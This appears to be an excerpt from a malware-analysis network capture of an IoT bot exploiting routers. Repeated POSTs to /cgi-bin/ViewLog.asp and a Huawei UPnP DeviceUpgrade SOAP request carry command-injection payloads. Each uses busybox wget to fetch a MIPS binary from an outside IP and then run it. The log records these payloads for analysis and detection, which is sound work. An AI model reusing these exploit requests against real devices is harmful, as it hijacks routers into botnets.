3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 54 69 6d 65 73 20 4e 65 77 20 52 6f 6d 61 69 6e 22 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 0a 20 20 20 20 3c 73 74 72 6f 6e 67 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html>
                                              Nov 23, 2023 05:18:15.287343025 CET755INHTTP/1.0 404 Not Found !!!
                                              Pragma: no-cache
                                              Content-type: text/html
                                              WWW-Authenticate: /cgi-bin/ViewLog.asp
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 21 21 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 63 65 6e 74 65 72 3e 0a 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 31 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 67 63 6f 6c 6f 72 3d 22 23 30 30 30 30 41 30 22 3e 0a 20 20 20 20 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 66 61 63 65 3d 22 41 72 69 61 6c 22 3e 0a 20 20 20 20 3c 73 74 72 6f 6e 67 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 21 21 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 67 63 6f 6c 6f 72 3d 22 23 46 33 46 33 46 33 22 20 62 6f 72 64 65 72 63 6f 6c 6f 72 3d 22 23 30 30 30 30 38 30 22 20 62 6f 72 64 65 72 63 6f 6c 6f 72 64 61 72 6b 3d 22 23 30 30 30 30 38 30 22 3e 0a 20 20 20 20 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 54 69 6d 65 73 20 4e 65 77 20 52 6f 6d 61 69 6e 22 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 0a 20 20 20 20 3c 73 74 72 6f 6e 67 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              761192.168.2.135436694.30.1.1778080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:14.934273958 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:15.116871119 CET765INHTTP/1.0 404 Not Found !!!
                                              Cache-Control: no-cache, no-store, must-revalidate
                                              Pragma: no-cache
                                              Content-type: text/html
                                              <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html>
                                              Data Raw:
                                              Data Ascii:


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              762192.168.2.1352328106.53.18.2123
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:15.501640081 CET219INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 37 3a 32 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:17:24Auth Result: Invalid user.


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              763192.168.2.133500894.120.35.2038080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:15.745971918 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              764192.168.2.136083485.122.206.2298080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:15.760251045 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              765192.168.2.134845085.69.31.2068080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:15.928237915 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:16.486166000 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:17.606266022 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:19.814151049 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              766192.168.2.134251631.136.57.888080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:15.928848982 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:16.486164093 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:17.606281042 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.070174932 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              767192.168.2.134190494.137.182.1658080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:15.998506069 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:16.237507105 CET163INHTTP/1.1 404 Not Found
                                              Cache-control: no-cache
                                              Server: Ubicom/1.1
                                              Content-Length: 9
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              768192.168.2.1346712156.254.71.15937215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.128592968 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:20.326208115 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              769192.168.2.1352352106.53.18.2123
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.180248976 CET219INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 37 3a 32 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:17:25Auth Result: Invalid user.


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              770192.168.2.135733031.33.14.1588080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.383263111 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              771192.168.2.133792662.87.204.1148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:16.414695978 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
